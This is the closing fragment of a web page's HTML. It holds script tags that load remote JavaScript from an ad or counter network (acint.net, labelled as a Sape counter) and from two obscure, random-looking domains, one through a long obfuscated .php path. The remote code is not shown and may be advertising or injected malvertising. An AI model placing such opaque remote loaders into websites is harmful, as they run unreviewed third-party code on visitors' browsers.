var _acic={dataProvider:10};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="//www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})()
</script>
<!-- Sape counter -->

<script>window.RESOURCE_O1B2L3 = 'sdfgdgf.info';</script>
<script src="//sdfgdgf.info/ux/CHxq.js" ></script>


<script async src="//dwbogv.com/8snl17291ivlm0p3y0hq8786uqv678kypxu1lk8.php"></script>

</body>
</html>
